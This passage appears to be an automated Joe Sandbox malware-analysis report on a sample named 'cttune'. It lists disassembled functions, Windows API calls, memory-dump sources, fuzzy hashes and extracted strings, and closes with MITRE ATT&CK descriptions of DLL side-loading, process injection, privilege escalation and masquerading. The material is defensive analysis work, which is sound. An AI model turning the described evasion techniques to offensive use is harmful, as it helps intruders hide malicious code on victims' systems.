Instruction Fuzzy Hash: 9C312FB5A0020AAFDB10DFD8D8809EFB7B9FF88704B108559E515AB214D775EE45CBA0

Function 00A8F730 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00A8F747
CoUninitialize.COMBASE ref: 00A8F82E

Strings

@J7<, xrefs: 00A8F75B

Memory Dump Source

Source File: 0000000B.00000002.3288064284.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a70000_cttune.jbxd

Yara matches

Similarity

API ID: InitializeUninitialize
String ID: @J7<
API String ID: 3442037557-2016760708
Opcode ID: 0c534359f8d1820b8d8d3776f459812ab710eb20171a55e12e3e2cde257cdff4
Instruction ID: 4610363caefe3db99cd0645ada894b5f103f98b9673b7928b6a9f48be0368ec5
Opcode Fuzzy Hash: 0c534359f8d1820b8d8d3776f459812ab710eb20171a55e12e3e2cde257cdff4
Instruction Fuzzy Hash: D23130B5A0020A9FDB00DFD8D8809EFB7B9BF88304F108559E505EB214D775EE45CBA0

Function 00A84810 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00A84882

Memory Dump Source

Source File: 0000000B.00000002.3288064284.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a70000_cttune.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 54fb147e668d09699b38c2b31a46252e66a45ffa0a78401e78df278bd00db131
Instruction ID: 4f392a68eefe0463020cbaecdc3dad2d275ce4b2639398c80d0795f7ed1a6a58
Opcode Fuzzy Hash: 54fb147e668d09699b38c2b31a46252e66a45ffa0a78401e78df278bd00db131
Instruction Fuzzy Hash: C701DEB5E4020EABDF10EBE4DD42F9DB7B89B58308F008195A91897241FA75EB54CB91

Function 00A99A10 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,?,00000000,?,00A885BE,00000010,?,?,?,00000044,?,00000010,00A885BE,?,00000000,?), ref: 00A99A70

Memory Dump Source

Source File: 0000000B.00000002.3288064284.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a70000_cttune.jbxd

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: b99a4a5aa213c43e4e724ddd4af610961b87da9c8540730c61e1aae46a735713
Instruction ID: 7366aae4fd8c51d4ff2fb13a49aae40d2985a159c4acb7cdd18938460af0967f
Opcode Fuzzy Hash: b99a4a5aa213c43e4e724ddd4af610961b87da9c8540730c61e1aae46a735713
Instruction Fuzzy Hash: 530180B2214108BBCB44DE99DC81EEB77EDAF8C754F518219BA19E3241D630F8518BA4

Function 00A79D90 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00A79DD5

Memory Dump Source

Source File: 0000000B.00000002.3288064284.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a70000_cttune.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: f27095829c54fc8ab99ed63e258eea87ac6b3382ffe36d9f8717ed405277cd35
Instruction ID: 365969216de72ff6beafdf6dd9ae4e56ebd846455aa5e13242baae501e7865d7
Opcode Fuzzy Hash: f27095829c54fc8ab99ed63e258eea87ac6b3382ffe36d9f8717ed405277cd35
Instruction Fuzzy Hash: 4CF0657339021436D73065A99C03FDB769CDB81761F144026F70CEB1C1D892B80182A8

Function 00A79D8A Relevance: 1.5, APIs: 1, Instructions: 35threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00A79DD5

Memory Dump Source

Source File: 0000000B.00000002.3288064284.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a70000_cttune.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 9b9ab8b100bfc83089ac78af4b4adcc4cad82ce51cbc7896d2daf9de4f76e7ba
Instruction ID: 31713f90b44d254c3a57fbce43df75195635c14358b58f8266d92bd77bacaea1
Opcode Fuzzy Hash: 9b9ab8b100bfc83089ac78af4b4adcc4cad82ce51cbc7896d2daf9de4f76e7ba
Instruction Fuzzy Hash: E0F09B7338020036E63065588D03FEB66DC8F80750F144119F70CEB1D1D552B84283A8

Function 00A810B2 Relevance: 1.5, APIs: 1, Instructions: 30threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000), ref: 00A810DD

Memory Dump Source

Source File: 0000000B.00000002.3288064284.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a70000_cttune.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 5d649709ee47c147a6ea2761ba86acbb42b3f7230ad0159c27ccc6b7925605f8
Instruction ID: 50a24f97ed31f8cec25c99352c9db0855373f86685099e59aecf23f1fa574b1e
Opcode Fuzzy Hash: 5d649709ee47c147a6ea2761ba86acbb42b3f7230ad0159c27ccc6b7925605f8
Instruction Fuzzy Hash: 72E0D8B6A4014D35E722DD799D43BF97B2CD740740F100357EA95B1085E6505D078AA2

Function 00A99980 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000000,00000004,00000000,4E8B0446,00000007,00000000,00000004,00000000,00A84092,000000F4), ref: 00A999BF

Memory Dump Source

Source File: 0000000B.00000002.3288064284.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a70000_cttune.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: e3bcd0732160e3b6f71be127c7a65e4ca80d18ba13c7f5289b9116d8d7022430
Instruction ID: 7840256f7747eaa863f00b5cd610fec99ca8d6e438e7c85f58ac119294093e06
Opcode Fuzzy Hash: e3bcd0732160e3b6f71be127c7a65e4ca80d18ba13c7f5289b9116d8d7022430
Instruction Fuzzy Hash: 88E06D72610204BBD610EE68DC41F9B37ACDF85710F008009F90CA7242C770B91186B4

Function 00A99930 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00A81CE9,?,00A95C9A,00A81CE9,00A9585E,00A95C9A,?,00A81CE9,00A9585E,00001000,?,?,00000000), ref: 00A9996C

Memory Dump Source

Source File: 0000000B.00000002.3288064284.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a70000_cttune.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 73b2d8e897333f4cbf0dabf0c85a12c2b34041909e0ddd2ad4c4f879b0146da9
Instruction ID: d667353cf0a050c18b4e37a8a450202ec05910a3c93f615f8bda9e55750ff117
Opcode Fuzzy Hash: 73b2d8e897333f4cbf0dabf0c85a12c2b34041909e0ddd2ad4c4f879b0146da9
Instruction Fuzzy Hash: 72E092B56102047BD610EE58DC45F9B77ACEFC5750F008409FD0DA7241D630B8118BB5

Function 00A88600 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 00A8862C

Memory Dump Source

Source File: 0000000B.00000002.3288064284.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a70000_cttune.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: b085c912700a13a5ea0e5ecfa31ff90c4c11c70246546c558087bd4eeebd270e
Instruction ID: 38fe2a0aa5437095d8f7eb8ad11e8866ee13643e10521507f3c6a9c888615a63
Opcode Fuzzy Hash: b085c912700a13a5ea0e5ecfa31ff90c4c11c70246546c558087bd4eeebd270e
Instruction Fuzzy Hash: 33E04F7165020426EB247AA89C46B6633589B48764F984664BA1C9B6C1ED78F9028364

Function 00A883E7 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,00A81FF0,00A9819F,00A9585E,00A81FB6), ref: 00A88423

Memory Dump Source

Source File: 0000000B.00000002.3288064284.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a70000_cttune.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 2d5bcbfba28a3a395452388389b68bb610f3028c0e92ba85e8a034c8e46786cd
Instruction ID: 0c6acb8736586d42817f32dd3971645ec2c6fdcb9f8d453ca9289e7806c73bef
Opcode Fuzzy Hash: 2d5bcbfba28a3a395452388389b68bb610f3028c0e92ba85e8a034c8e46786cd
Instruction Fuzzy Hash: F9E0CD727502053FE710E7E8DD42F7923C85744754F158074BA08D71C2D924A5128664

Function 00A883F0 Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,00A81FF0,00A9819F,00A9585E,00A81FB6), ref: 00A88423

Memory Dump Source

Source File: 0000000B.00000002.3288064284.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a70000_cttune.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 77a7ae2053aca9a341e1a0b427c3bcb6d491eb1123e6fcf2fa57344fe658b3a2
Instruction ID: f4f35140d84d4fe5989e86e48f1ace0fa7981cb2bedb8cd7660a08d80f9ca8fe
Opcode Fuzzy Hash: 77a7ae2053aca9a341e1a0b427c3bcb6d491eb1123e6fcf2fa57344fe658b3a2
Instruction Fuzzy Hash: 8CD05EB66902053BE600B7A4CD07F26328C9B04754F59C068BA0CE72C2ED65F5018669

Function 04AB2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04AB2C24

Memory Dump Source

Source File: 0000000B.00000002.3290150361.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true

Associated: 0000000B.00000002.3290150361.0000000004B69000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3290150361.0000000004B6D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3290150361.0000000004BDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4a40000_cttune.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 816464059656139519a81d9d8e73f7ca621b553d11238896cb94d33e200287b6
Instruction ID: 3d16c97899eed06efe7d4dbfc7d642d4d76ddc12df9d7846b4a482e759986a3c
Opcode Fuzzy Hash: 816464059656139519a81d9d8e73f7ca621b553d11238896cb94d33e200287b6
Instruction Fuzzy Hash: 74B04C729015C585EA51A76046087167A046B91706F56C066D2420641A4729D591E1B5

Non-executed Functions

Function 04D9DD99 Relevance: 56.5, Strings: 45, Instructions: 212COMMON

Download Yara Rule

Strings

@@@@, xrefs: 04D9DEF3
4567, xrefs: 04D9DE1A
@@@@, xrefs: 04D9DF39
%&'(, xrefs: 04D9DE83
@@@@, xrefs: 04D9DF7F
-./0, xrefs: 04D9DE91
@@@@, xrefs: 04D9DEE5
@@@@, xrefs: 04D9DE67
@@@@, xrefs: 04D9DEBB
@@@@, xrefs: 04D9DF1D
@@@@, xrefs: 04D9DE2F
89:;, xrefs: 04D9DE21
@@@@, xrefs: 04D9DF2B
@@@@, xrefs: 04D9DF78
)*+,, xrefs: 04D9DE8A
@@@@, xrefs: 04D9DED7
!"#$, xrefs: 04D9DE7C
@@@@, xrefs: 04D9DF40
@@@@, xrefs: 04D9DEDE
@@@@, xrefs: 04D9DF55
@@@@, xrefs: 04D9DF16
@@@@, xrefs: 04D9DEA6
@@@@, xrefs: 04D9DEC9
@@@@, xrefs: 04D9DF6A
@@@@, xrefs: 04D9DF71
@@@@, xrefs: 04D9DF0F
@@@@, xrefs: 04D9DF01
@@@@, xrefs: 04D9DEB4
123@, xrefs: 04D9DE98
@@@@, xrefs: 04D9DED0
@@@@, xrefs: 04D9DEC2
?, xrefs: 04D9DF90
@@@@, xrefs: 04D9DEAD
@@@@, xrefs: 04D9DF08
@@@?, xrefs: 04D9DE13
@@@@, xrefs: 04D9DF4E
@@@@, xrefs: 04D9DF32
@@@@, xrefs: 04D9DF47
@@@@, xrefs: 04D9DF5C
@@@@, xrefs: 04D9DF63
<=@@, xrefs: 04D9DE28
@@@@, xrefs: 04D9DEEC
@@@@, xrefs: 04D9DE9F
@@@@, xrefs: 04D9DF24
@@@@, xrefs: 04D9DEFA

Memory Dump Source

Source File: 0000000B.00000002.3290722789.0000000004D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4d90000_cttune.jbxd

Similarity

API ID:
String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
API String ID: 0-3558027158
Opcode ID: a285dd3379b611f52df1049f68d4609f0046b3671128ea88421c99d7784038de
Instruction ID: 71d59365c914e2e3d737e5338afa543fc26a7217fb6ef5be9d36f3cfa35de255
Opcode Fuzzy Hash: a285dd3379b611f52df1049f68d4609f0046b3671128ea88421c99d7784038de
Instruction Fuzzy Hash: 8A9152F04082948AC7158F55A0652AFFFB1EBC6305F15816DE7E6BB243C3BE8945CB85

Function 04AB2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 04AB293C
___swprintf_l.LIBCMT ref: 04AB295E
___swprintf_l.LIBCMT ref: 04AB29A3
___swprintf_l.LIBCMT ref: 04AEA52E

Strings

::ffff:0:%u.%u.%u.%u, xrefs: 04AEA54E
:%u.%u.%u.%u, xrefs: 04AEA5B8
::%hs%u.%u.%u.%u, xrefs: 04AEA527
ffff:, xrefs: 04AEA504

Memory Dump Source

Source File: 0000000B.00000002.3290150361.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true

Associated: 0000000B.00000002.3290150361.0000000004B69000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3290150361.0000000004B6D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3290150361.0000000004BDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4a40000_cttune.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 87d3d8eb3062052e7ce828ed59ff7afedcddf4a88a9a006ced61507f955c675c
Instruction ID: a63f1dd75496701c63b59e4afffdfd7e0ce06ae62a117481c9406e9361c8f37d
Opcode Fuzzy Hash: 87d3d8eb3062052e7ce828ed59ff7afedcddf4a88a9a006ced61507f955c675c
Instruction Fuzzy Hash: BA51CAB6A04116BFDB10DF9989946BEF7BCBB48204714816AE4E9D7642D334FE5087E0

Function 04AA7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04AE4725
ExecuteOptions, xrefs: 04AE46A0
Execute=1, xrefs: 04AE4713
CLIENT(ntdll): Processing section info %ws..., xrefs: 04AE4787
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04AE4655
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 04AE46FC
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04AE4742

Memory Dump Source

Source File: 0000000B.00000002.3290150361.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true

Associated: 0000000B.00000002.3290150361.0000000004B69000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3290150361.0000000004B6D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3290150361.0000000004BDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4a40000_cttune.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: 488b165022e05a135d6c313a22f30bc8f318bf1ba47cb33e298d868029200108
Instruction ID: b252bd9c0c22e0f2954dab2ab841d229095d151815de9eaf0b9aa42d2c2a299d
Opcode Fuzzy Hash: 488b165022e05a135d6c313a22f30bc8f318bf1ba47cb33e298d868029200108
Instruction Fuzzy Hash: BA51D775A00219BBEB21ABA5DD85BFB77B8EB08304F040099E505AB191E771FE558F90

Function 04ABB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 04ABB6BF

Strings

-, xrefs: 04ABB650
0, xrefs: 04ABB695
0, xrefs: 04ABB66F
+, xrefs: 04ABB65A

Memory Dump Source

Source File: 0000000B.00000002.3290150361.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true

Associated: 0000000B.00000002.3290150361.0000000004B69000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3290150361.0000000004B6D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3290150361.0000000004BDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4a40000_cttune.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction ID: 6e430b7ab2a8cd477fca8f0670242458cd217c01c84ef3dc3a09aa0eb6cf918c
Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction Fuzzy Hash: CD816070E062499EDF24CFA8C8517EEBBB9AF45310F184659D8D1A7A92D634B88087F1

Function 04A9F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04AE02BD
RTL: Re-Waiting, xrefs: 04AE031E
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04AE02E7

Memory Dump Source

Source File: 0000000B.00000002.3290150361.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true

Associated: 0000000B.00000002.3290150361.0000000004B69000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3290150361.0000000004B6D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3290150361.0000000004BDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4a40000_cttune.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: 0cc9baa2b926bfa092fa476f2918ce31aaf1c3a22305279e865b6cfe3fa73341
Instruction ID: b1ec17e077f952e2078d1ed130e0cb3912f0f5e352d629bdb4dcf2a08b4d0efe
Opcode Fuzzy Hash: 0cc9baa2b926bfa092fa476f2918ce31aaf1c3a22305279e865b6cfe3fa73341
Instruction Fuzzy Hash: C5E1BE706087419FDB25CF28C984B6AB7E0BB88318F144A6DF5A5CB2E1E775F845CB42

Function 04AABED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

RTL: Re-Waiting, xrefs: 04AE7BAC
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 04AE7B7F
RTL: Resource at %p, xrefs: 04AE7B8E

Memory Dump Source

Source File: 0000000B.00000002.3290150361.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true

Associated: 0000000B.00000002.3290150361.0000000004B69000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3290150361.0000000004B6D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3290150361.0000000004BDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4a40000_cttune.jbxd

Similarity

API ID:
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 0-871070163
Opcode ID: e6f97d800e339368c7b42151bc6bc63ebc9341570a8629f447a13fe0fbbd6049
Instruction ID: 67c9707724b2e07791e484c6dedbbdf1fe3d0ddb7b4093dcdb7fec33d3b3e173
Opcode Fuzzy Hash: e6f97d800e339368c7b42151bc6bc63ebc9341570a8629f447a13fe0fbbd6049
Instruction Fuzzy Hash: 3341E1353007029FD720DF25D940B6AB7E5EF88710F040A1DFA6A9B680DB31F8158BA1

Function 04AAB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04AE728C

Strings

RTL: Re-Waiting, xrefs: 04AE72C1
RTL: Resource at %p, xrefs: 04AE72A3
RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 04AE7294

Memory Dump Source

Source File: 0000000B.00000002.3290150361.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true

Associated: 0000000B.00000002.3290150361.0000000004B69000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3290150361.0000000004B6D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3290150361.0000000004BDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4a40000_cttune.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: 4aaab1f4460484a243dd249e607d1065b99b0652872ca265cc8e00cfa2740183
Instruction ID: 37b337f810f3ae1ac819f986fdaa2f5e04e75ad11fe4b7170c97c23ec9e179d4
Opcode Fuzzy Hash: 4aaab1f4460484a243dd249e607d1065b99b0652872ca265cc8e00cfa2740183
Instruction Fuzzy Hash: 5241E235700202AFD720DF65CD41B6AB7A5FF84714F100619FA66EB241DB31F8529BE1

Function 04AB7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 04AB7E8B

Strings

+, xrefs: 04AB7DE8
-, xrefs: 04AB7DDD

Memory Dump Source

Source File: 0000000B.00000002.3290150361.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true

Associated: 0000000B.00000002.3290150361.0000000004B69000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3290150361.0000000004B6D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3290150361.0000000004BDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4a40000_cttune.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction ID: 2a715ce5bd03741c52d014097ca8f7c2e3ad6ac0e9c745894ef6a3467d3e668b
Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction Fuzzy Hash: 9A91C774E002159EDB24DF69C8806FEB7BDAF84760F14451AE8D5E72C2E7B4A940C794

Function 04A79126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

@, xrefs: 04A79175
$, xrefs: 04A79191

Memory Dump Source

Source File: 0000000B.00000002.3290150361.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true

Associated: 0000000B.00000002.3290150361.0000000004B69000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3290150361.0000000004B6D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3290150361.0000000004BDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4a40000_cttune.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: b00e8900e2788e7035f16fa0b8cfa23ca6c16bb0243479215b98f1adcce49d5b
Instruction ID: 1d5813c415cf01c1282f88727b70c8e1a97e70c1bf8761ea7788df09cf235ed7
Opcode Fuzzy Hash: b00e8900e2788e7035f16fa0b8cfa23ca6c16bb0243479215b98f1adcce49d5b
Instruction Fuzzy Hash: B1811DB2D01269DBDB31DB54CD44BEAB7B8AB08754F0041DAE91AB7240E7346E84CFA0

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

